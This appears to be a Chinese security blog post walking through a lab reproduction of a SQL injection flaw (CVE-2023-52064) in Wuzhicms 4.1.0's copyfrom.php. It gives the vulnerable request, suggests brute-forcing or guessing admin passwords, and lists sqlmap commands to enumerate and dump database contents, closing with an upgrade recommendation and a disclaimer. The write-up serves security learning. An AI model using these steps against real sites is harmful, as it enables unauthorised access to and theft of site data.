微信公众号:【秋风有意染黄花】分享安全学习的心得和笔记。问题与建议,请公众号留言或私信。
Wuzhicms 是一款基于 PHP 和 MySQL 的开源内容管理系统,支持第三方APP 接入功能。Wuzhicms v4.1.0 存在一个严重的 SQL 注入漏洞(CVE-2023-52064),漏洞被发现于核心文件 /core/admin/copyfrom.php 中的 $keywords 参数。$keywords参数未经过滤或转义,直接拼接到 SQL 查询的 WHERE 子句中,导致 SQL 注入攻击。受影响版本:Wuzhicms 4.1.0 及以下版本。
实验环境
环境下载:https://github.com/wuzhicms/wuzhicms/releases
安装说明:https://www.wuzhicms.com/doc/2.html
漏洞复现
1.搭建实验环境。
a.可以自行下载wuzhicms-4.1.0到本地,搭建到虚拟机中。
b.使用网上的免费靶场,开启CVE-2023-52064靶场环境。
2.访问实验环境,进入登录界面。
如访问:http://127.0.0.1/www/index.php?m=core&v=login&_su=wuzhicms
注:a.登录页面,可以通过密码猜测攻击或使用burp suite尝试暴力破解。(自己下载安装的实验环境一般为自己设置账号密码,其他免费靶场可能设置账号密码为admin/admin123或admin/admin等)
b.127.0.0.1需要替换为实际的IP。
3.登录系统,进入主页。
4.分析存在问题的文件,wuzhicms-4.1.0wuzhicms-4.1.0coreframeappcoreadmincopyfrom.php
5.结合网上已经公开的漏洞信息,构造payload:
GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&keywords=1 HTTP/1.1Host: 127.0.0.1
6.使用Burp Suite抓取该数据包,复制存入2.txt中,再使用sqlmap获取数据库名。
sqlmap -r 2.txt -batch -dbs
7.还可以进一步获取表名、字段名、数据,以下为示例(实际以具体的数据库名、表名、字段名为准):
sqlmap -r 2.txt -batch -D wuzhicms --Tablessqlmap -r 2.txt -batch -D wuzhicms -T flllaaaag --columnssqlmap -r 2.txt -batch -D wuzhicms -T flllaaaag -C flag --dump
漏洞修复
回顾以上实验过程,主要是因为Wuzhicms低版本系统未对用户输入$keywords 参数进行严格的过滤导致了SQL注入问题。CVE-2023-52064漏洞为高危漏洞,如果在实际工作环境中存在此漏洞,建议相关系统尽快进行升级修复。
免责声明
我们本着技术分享的原则,分享学习心得和工具掌握,请勿将其用于任何非授权的行为,请严格遵守国家信息安全法。任何违反法律、法规的行为,均与本人无关。建议所有的操作在虚拟机中进行,自己搭建实验环境,安全性自检。若是有违规的地方,请联系删除。
原文始发于微信公众号(秋风有意染黄花):Wuzhicms v4.1.0 SQL注入漏洞(CVE-2023-52064)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论